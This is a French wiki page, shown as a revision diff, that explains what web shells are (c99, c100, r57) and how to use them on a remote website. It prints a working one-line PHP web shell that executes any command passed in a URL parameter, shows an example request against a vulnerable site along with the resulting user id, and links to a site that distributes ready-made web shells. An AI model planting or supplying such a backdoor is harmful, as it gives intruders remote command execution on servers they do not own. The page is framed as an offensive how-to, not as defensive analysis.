Ci-dessous, les différences entre deux révisions de la page.
— |
web:webshell [2017/01/18 15:45] (Version actuelle) arkinar créée |
||
---|---|---|---|
Ligne 1: | Ligne 1: | ||
+ | **WEBSHELL** | ||
+ | |||
+ | **1.Présentation** | ||
+ | |||
+ | Un Web Shell est un script développé le plus souvent en PHP, ASP et qui permet d’exécuter des commandes à distance sur le serveur. | ||
+ | |||
+ | Les plus connu sont c99, c100, r57. Ce sont des webshells évolués permettant toute une multitude de possibilités. | ||
+ | |||
+ | <del>c99 une backdoor backdooré c'est un comble non ?</del> | ||
+ | |||
+ | |||
+ | **2.Exploitation** | ||
+ | |||
+ | Dans un premier temps il faut uploader ou insérer notre webshell dans le site web distant. | ||
+ | |||
+ | Dans un second temps nous pouvons exécuter toutes les commandes que nous souhaitons avec les droits de l'utilisateur web. | ||
+ | |||
+ | __2.1 Méthode 1 : Script fait maison__ | ||
+ | |||
+ | Le script fait maison sera toujours la meilleur solution. | ||
+ | |||
+ | Il s’adaptera parfaitement à votre besoin. | ||
+ | |||
+ | Un webshell peut être concis , il n'est pas obligé d'être très long : | ||
+ | |||
+ | <file php webshell.php> | ||
+ | <?php $cmd=$_GET["cmd"]; echo `$cmd`; ?> | ||
+ | </file> | ||
+ | |||
+ | Afficher l'id de l'utilisateur | ||
+ | <code> | ||
+ | http://monsitefaillible.fr/webshell.php?cmd=id | ||
+ | |||
+ | => uid=33(www-data) gid=33(www-data) groups=33(www-data) | ||
+ | </code> | ||
+ | |||
+ | __2.2 Méthode 2 : Script récupéré__ | ||
+ | |||
+ | De nombreux webshells se trouvent sur internet. Analysez les avant de les utilisez , ils contiennent souvent des mauvaises surprises. | ||
+ | |||
+ | [[http://www.r57.gen.tr/|site téléchargement webshell]] | ||
+ | |||